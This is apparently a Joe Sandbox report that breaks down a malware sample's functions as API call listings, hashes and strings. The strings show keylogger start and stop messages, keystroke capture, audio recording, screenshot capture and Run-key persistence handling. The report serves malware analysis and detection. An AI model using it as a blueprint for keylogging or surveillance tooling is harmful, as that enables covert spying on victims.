                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: ACP$OCP
                                                                                                                    • API String ID: 0-711371036
                                                                                                                    • Opcode ID: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                                                                                    • Instruction ID: 0ee4350655218b6c75cd3052c0190142cf4d5733969cac988e1a0851f3347a37
                                                                                                                    • Opcode Fuzzy Hash: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                                                                                    • Instruction Fuzzy Hash: 832148EBA00100A6F7308F55C801B9773AAAB90B23F564426EC49D730BF73ADE08C358
                                                                                                                    APIs
                                                                                                                    • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00417D04
                                                                                                                      • Part of subcall function 004177A2: GdipLoadImageFromStream.GDIPLUS(?,?,?,00417C2B,00000000,?,?,?,?,00000000), ref: 004177B6
                                                                                                                    • SHCreateMemStream.SHLWAPI(00000000,00000000,00000000,?,?,?,?,00000000), ref: 00417D29
                                                                                                                      • Part of subcall function 00417815: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00417C81,00000000,?,?), ref: 00417827
                                                                                                                      • Part of subcall function 004177C5: GdipDisposeImage.GDIPLUS(?,00417CDC), ref: 004177CE
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                                                                                    • String ID: image/png
                                                                                                                    • API String ID: 1291196975-2966254431
                                                                                                                    • Opcode ID: 08c2138a1cde22915990e47635910406e292a08e99f34f914930cbe525dd8b1a
                                                                                                                    • Instruction ID: 1f40aeda14031b83fd9eea2ddee5e82f5a36372f8d90ac1696f7ac499827f772
                                                                                                                    • Opcode Fuzzy Hash: 08c2138a1cde22915990e47635910406e292a08e99f34f914930cbe525dd8b1a
                                                                                                                    • Instruction Fuzzy Hash: 4621A135204211AFC300AF61CC88CAFBBBDEFCA755F10052EF90693151DB399945CBA6
                                                                                                                    APIs
                                                                                                                    • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 004049F1
                                                                                                                      • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                    • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 00404A4E
                                                                                                                    Strings
                                                                                                                    • KeepAlive | Enabled | Timeout: , xrefs: 004049E5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: LocalTime
                                                                                                                    • String ID: KeepAlive | Enabled | Timeout:
                                                                                                                    • API String ID: 481472006-1507639952
                                                                                                                    • Opcode ID: aed4b22af28715f9db634eb419df8fd1999f1e562c63feb9a046f88b8b646f5c
                                                                                                                    • Instruction ID: 8fc2066b5dd234cef981570443e677007340a491061b3c72667858eadfbc0999
                                                                                                                    • Opcode Fuzzy Hash: aed4b22af28715f9db634eb419df8fd1999f1e562c63feb9a046f88b8b646f5c
                                                                                                                    • Instruction Fuzzy Hash: EF2129A1A042806BC310FB6A980676B7B9457D1315F48417EF948532E2EB3C5999CB9F
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4500070405.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4500044191.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4500070405.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_10000000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _strlen
                                                                                                                    • String ID: : $Se.
                                                                                                                    • API String ID: 4218353326-4089948878
                                                                                                                    • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                                    • Instruction ID: 66f447a9efa091531784e06c0e565222335d100d85517175c1dac28435e0d9bb
                                                                                                                    • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                                    • Instruction Fuzzy Hash: 2F11E7B5904249AEDB11DFA8D841BDEFBFCEF09244F104056E545E7252E6706B02C765
                                                                                                                    APIs
                                                                                                                    • GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: LocalTime
                                                                                                                    • String ID: | $%02i:%02i:%02i:%03i
                                                                                                                    • API String ID: 481472006-2430845779
                                                                                                                    • Opcode ID: dd8d37a997ed350f5b585b7e1a1411d3330e7c11f40c45cf8dce4cd77559f448
                                                                                                                    • Instruction ID: f196d4ed1927782274832919bda13c77b2b6189c6c06a517aeeeb96a95a688aa
                                                                                                                    • Opcode Fuzzy Hash: dd8d37a997ed350f5b585b7e1a1411d3330e7c11f40c45cf8dce4cd77559f448
                                                                                                                    • Instruction Fuzzy Hash: 81114C725082045AC704EBA5D8568AF73E8EB94708F10053FFC85931E1EF38DA84C69E
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
                                                                                                                      • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                                                      • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0040A7CA
                                                                                                                    • UnhookWindowsHookEx.USER32 ref: 0040A7DD
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                                                                    • String ID: Online Keylogger Stopped
                                                                                                                    • API String ID: 1623830855-1496645233
                                                                                                                    • Opcode ID: fedb9acac80da4baee9d3d26bf8b07834ee1ff9dec99e7e583def64b732056b5
                                                                                                                    • Instruction ID: 9ca866747e1af720c58b6b078daeda0145c7b5fd7bd766bf2ea1503866da158c
                                                                                                                    • Opcode Fuzzy Hash: fedb9acac80da4baee9d3d26bf8b07834ee1ff9dec99e7e583def64b732056b5
                                                                                                                    • Instruction Fuzzy Hash: 8101D431A043019BDB25BB35C80B7AEBBB19B45315F40407FE481275D2EB7999A6C3DB
                                                                                                                    APIs
                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 10002903
                                                                                                                      • Part of subcall function 100035D2: RaiseException.KERNEL32(?,?,?,10002925,00000000,00000000,00000000,?,?,?,?,?,10002925,?,100121B8), ref: 10003632
                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 10002920
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4500070405.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4500044191.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4500070405.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_10000000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                    • String ID: Unknown exception
                                                                                                                    • API String ID: 3476068407-410509341
                                                                                                                    • Opcode ID: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                                                                                    • Instruction ID: 696891806b75a506f07e96a947ab79166ff1ea0d2f17bc9dac180a151cc952bd
                                                                                                                    • Opcode Fuzzy Hash: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                                                                                    • Instruction Fuzzy Hash: 2BF0A47890420D77AB04E6E5EC4599D77ACDB006D0F508161FD1496499EF31FA658690
                                                                                                                    APIs
                                                                                                                    • waveInPrepareHeader.WINMM(00D85188,00000020,?,?,00000000,00475B90,00473EE8,?,00000000,00401913), ref: 00401747
                                                                                                                    • waveInAddBuffer.WINMM(00D85188,00000020,?,00000000,00401913), ref: 0040175D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: wave$BufferHeaderPrepare
                                                                                                                    • String ID: T=G
                                                                                                                    • API String ID: 2315374483-379896819
                                                                                                                    • Opcode ID: b5a1dd24f47cf6807038c428b2f4b185eaaf619d090bdcfa74a6be548d705e4e
                                                                                                                    • Instruction ID: f8644d152c35c587af506687758c025c54344a6e575747702fe1289d7b8da532
                                                                                                                    • Opcode Fuzzy Hash: b5a1dd24f47cf6807038c428b2f4b185eaaf619d090bdcfa74a6be548d705e4e
                                                                                                                    • Instruction Fuzzy Hash: 65018B71301300AFD7209F39EC45A69BBA9EB4931AF01413EB808D32B1EB34A8509B98
                                                                                                                    APIs
                                                                                                                    • IsValidLocale.KERNEL32(00000000,z=D,00000000,00000001,?,?,00443D7A,?,?,?,?,00000004), ref: 004477EC
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: LocaleValid
                                                                                                                    • String ID: IsValidLocaleName$z=D
                                                                                                                    • API String ID: 1901932003-2791046955
                                                                                                                    • Opcode ID: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
                                                                                                                    • Instruction ID: b87742f2873dd73c0a7d5aade023b210d3410e3306d67f57874115e62e910f2b
                                                                                                                    • Opcode Fuzzy Hash: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
                                                                                                                    • Instruction Fuzzy Hash: 72F0E930A45318F7DA106B659C06F5E7B54CF05711F50807BFD046A283CE796D0285DC
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID: T=G$T=G
                                                                                                                    • API String ID: 3519838083-3732185208
                                                                                                                    • Opcode ID: 982f7bd813af9d9c889e4a2d4ec4ec1ff60f17d6450c8448ea392ea3d49e0b1a
                                                                                                                    • Instruction ID: f0e76400c825ed045590d0aed9209fb7c3a86c2d0af9b05bbbbea7315d156e8c
                                                                                                                    • Opcode Fuzzy Hash: 982f7bd813af9d9c889e4a2d4ec4ec1ff60f17d6450c8448ea392ea3d49e0b1a
                                                                                                                    • Instruction Fuzzy Hash: 77F0E971A00221ABC714BB65C80569EB774EF4136DF10827FB416B72E1CBBD5D04D65D
                                                                                                                    APIs
                                                                                                                    • GetKeyState.USER32(00000011), ref: 0040AD5B
                                                                                                                      • Part of subcall function 00409B10: GetForegroundWindow.USER32 ref: 00409B3F
                                                                                                                      • Part of subcall function 00409B10: GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                                                                                      • Part of subcall function 00409B10: GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                                                                                      • Part of subcall function 00409B10: GetKeyState.USER32(00000010), ref: 00409B5C
                                                                                                                      • Part of subcall function 00409B10: GetKeyboardState.USER32(?), ref: 00409B67
                                                                                                                      • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                                                                                      • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                                                                                      • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                                                                                    • String ID: [AltL]$[AltR]
                                                                                                                    • API String ID: 2738857842-2658077756
                                                                                                                    • Opcode ID: 4e5e1223f7f845a1eab5c2f051b9cc675264121dd46054d4836379e51054800e
                                                                                                                    • Instruction ID: d2c0c429c9fe13b3c6c970781ecfc4970ab7400740a1dec538c1fc9fef0a0b20
                                                                                                                    • Opcode Fuzzy Hash: 4e5e1223f7f845a1eab5c2f051b9cc675264121dd46054d4836379e51054800e
                                                                                                                    • Instruction Fuzzy Hash: 47E0652134072117C898323EA91E6EE3A228F82B65B80416FF8866BAD6DD6D4D5053CB
                                                                                                                    APIs
                                                                                                                    • _free.LIBCMT ref: 00448835
                                                                                                                      • Part of subcall function 00446AD5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                                                                                      • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorFreeHeapLast_free
                                                                                                                    • String ID: `@$`@
                                                                                                                    • API String ID: 1353095263-20545824
                                                                                                                    • Opcode ID: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                                                                                    • Instruction ID: fd413ccac38a9f67c3de8d393d9e933a11814297f80871467d1a397382efd299
                                                                                                                    • Opcode Fuzzy Hash: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                                                                                    • Instruction Fuzzy Hash: 4DE06D371006059F8720DE6DD400A86B7E5EF95720720852AE89DE3710D731E812CB40
                                                                                                                    APIs
                                                                                                                    • GetKeyState.USER32(00000012), ref: 0040ADB5
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: State
                                                                                                                    • String ID: [CtrlL]$[CtrlR]
                                                                                                                    • API String ID: 1649606143-2446555240
                                                                                                                    • Opcode ID: 8b954ca590bdb4d290c694a5b82ac8cddf9bd556695a62cd8e1f2d6ba09f11ff
                                                                                                                    • Instruction ID: 615b7dbe40c0b8188db9493e0f2b19f017fb36a74fa458c508a435569d7d4a1e
                                                                                                                    • Opcode Fuzzy Hash: 8b954ca590bdb4d290c694a5b82ac8cddf9bd556695a62cd8e1f2d6ba09f11ff
                                                                                                                    • Instruction Fuzzy Hash: 71E0862170071117C514353DD61A67F39228F41776F80013FF882ABAC6E96D8D6023CB
                                                                                                                    APIs
                                                                                                                    • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040BFB2,00000000,004742E0,004742F8,?,pth_unenc), ref: 00412988
                                                                                                                    • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00412998
                                                                                                                    Strings
                                                                                                                    • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00412986
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: DeleteOpenValue
                                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                                                                    • API String ID: 2654517830-1051519024
                                                                                                                    • Opcode ID: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                                                                                    • Instruction ID: 4813e9247c8a4fa7715124fbb4df20ddc3d96ddce1d5e270e7c0f337b45b5704
                                                                                                                    • Opcode Fuzzy Hash: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                                                                                    • Instruction Fuzzy Hash: 0AE01270310304BFEF104F61ED06FDB37ACBB80B89F004165F505E5191E2B5DD54A658
                                                                                                                    APIs
                                                                                                                    • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040AF84
                                                                                                                    • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040AFAF
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: DeleteDirectoryFileRemove
                                                                                                                    • String ID: pth_unenc
                                                                                                                    • API String ID: 3325800564-4028850238
                                                                                                                    • Opcode ID: 61d114f186a888d4709b2c681f6d3031ab31f41b35aa7972edbcea0596dbeef1
                                                                                                                    • Instruction ID: b68931c7331ddc333ece9e06749e281aefc344294653c9eba2f2de372e339d66
                                                                                                                    • Opcode Fuzzy Hash: 61d114f186a888d4709b2c681f6d3031ab31f41b35aa7972edbcea0596dbeef1
                                                                                                                    • Instruction Fuzzy Hash: FEE046715112108BC610AB31EC44AEBB398AB05316F00487FF8D3A36A1DE38A988CA98
                                                                                                                    APIs
                                                                                                                    • TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                                                    • WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ObjectProcessSingleTerminateWait
                                                                                                                    • String ID: pth_unenc
                                                                                                                    • API String ID: 1872346434-4028850238
                                                                                                                    • Opcode ID: 0bcc8583bbfeaf574487765c88b71504591df5916e82e2463f0204abfb9b1fb3
                                                                                                                    • Instruction ID: 4302d9c34f7b4dbdac7fc8682473a51625df35810590c52ad239c14707b44b4b
                                                                                                                    • Opcode Fuzzy Hash: 0bcc8583bbfeaf574487765c88b71504591df5916e82e2463f0204abfb9b1fb3
                                                                                                                    • Instruction Fuzzy Hash: C1D0C938559211AFD7614B68BC08B453B6AA745222F108277F828413F1C72598A4AE1C
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CountInfoInputLastTick
                                                                                                                    • String ID: >G
                                                                                                                    • API String ID: 3478931382-1296849874
                                                                                                                    • Opcode ID: 7652f6734eefa1e2a9b5027fbe87b83264b541b1d7de72649e3f314060a3f59a
                                                                                                                    • Instruction ID: 569d6daaa5662565be238ffc564c13078da4f80c5dbfbbb46f8e554dd6e43052
                                                                                                                    • Opcode Fuzzy Hash: 7652f6734eefa1e2a9b5027fbe87b83264b541b1d7de72649e3f314060a3f59a
                                                                                                                    • Instruction Fuzzy Hash: C7D0127040020DBFCB00DFF5EC4D98D7FBCEB00359F104165A005A2111DB70E6448B14
                                                                                                                    APIs
                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401AD8), ref: 0043FB04
                                                                                                                    • GetLastError.KERNEL32 ref: 0043FB12
                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043FB6D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1717984340-0
                                                                                                                    • Opcode ID: 641cf42bdd343eb89e62379c4a250951f72419ef29a502270e4b2a68cd87e0bf
                                                                                                                    • Instruction ID: 94dc36b571f96c0084dd62d2177e44ea0606df48237064e9d41db09688609199
                                                                                                                    • Opcode Fuzzy Hash: 641cf42bdd343eb89e62379c4a250951f72419ef29a502270e4b2a68cd87e0bf
                                                                                                                    • Instruction Fuzzy Hash: 66413870E00206AFCF219F64C854A6BF7A9EF09320F1451BBF8585B2A1E738AC09C759

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:6.3%
                                                                                                                    Dynamic/Decrypted Code Coverage:9.2%
                                                                                                                    Signature Coverage:0%
                                                                                                                    Total number of Nodes:2000
                                                                                                                    Total number of Limit Nodes:77
                                                                                                                    execution_graph 40386 441819 40389 430737 40386->40389 40388 441825 40390 430756 40389->40390 40402 43076d 40389->40402 40391 430774 40390->40391 40392 43075f 40390->40392 40404 43034a memcpy 40391->40404 40403 4169a7 11 API calls 40392->40403 40395 4307ce 40397 430819 memset 40395->40397 40405 415b2c 11 API calls 40395->40405 40396 43077e 40396->40395 40400 4307fa 40396->40400 40396->40402 40397->40402 40399 4307e9 40399->40397 40399->40402 40406 4169a7 11 API calls 40400->40406 40402->40388 40403->40402 40404->40396 40405->40399 40406->40402 37669 442ec6 19 API calls 37843 4152c6 malloc 37844 4152e2 37843->37844 37845 4152ef 37843->37845 37847 416760 11 API calls 37845->37847 37847->37844 37848 4466f4 37867 446904 37848->37867 37850 446700 GetModuleHandleA 37853 446710 __set_app_type __p__fmode __p__commode 37850->37853 37852 4467a4 37854 4467ac __setusermatherr 37852->37854 37855 4467b8 37852->37855 37853->37852 37854->37855 37868 4468f0 _controlfp 37855->37868 37857 4467bd _initterm __wgetmainargs _initterm 37858 44681e GetStartupInfoW 37857->37858 37859 446810 37857->37859 37861 446866 GetModuleHandleA 37858->37861 37869 41276d 37861->37869 37865 446896 exit 37866 44689d _cexit 37865->37866 37866->37859 37867->37850 37868->37857 37870 41277d 37869->37870 37912 4044a4 LoadLibraryW 37870->37912 37872 412785 37904 412789 37872->37904 37920 414b81 37872->37920 37875 4127c8 37926 412465 memset ??2@YAPAXI 37875->37926 37877 4127ea 37938 40ac21 37877->37938 37882 412813 37956 40dd07 memset 37882->37956 37883 412827 37961 40db69 memset 37883->37961 37887 412822 37982 4125b6 ??3@YAXPAX 37887->37982 37888 40ada2 _wcsicmp 37889 41283d 37888->37889 37889->37887 37892 412863 CoInitialize 37889->37892 37966 41268e 37889->37966 37986 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37892->37986 37896 41296f 37988 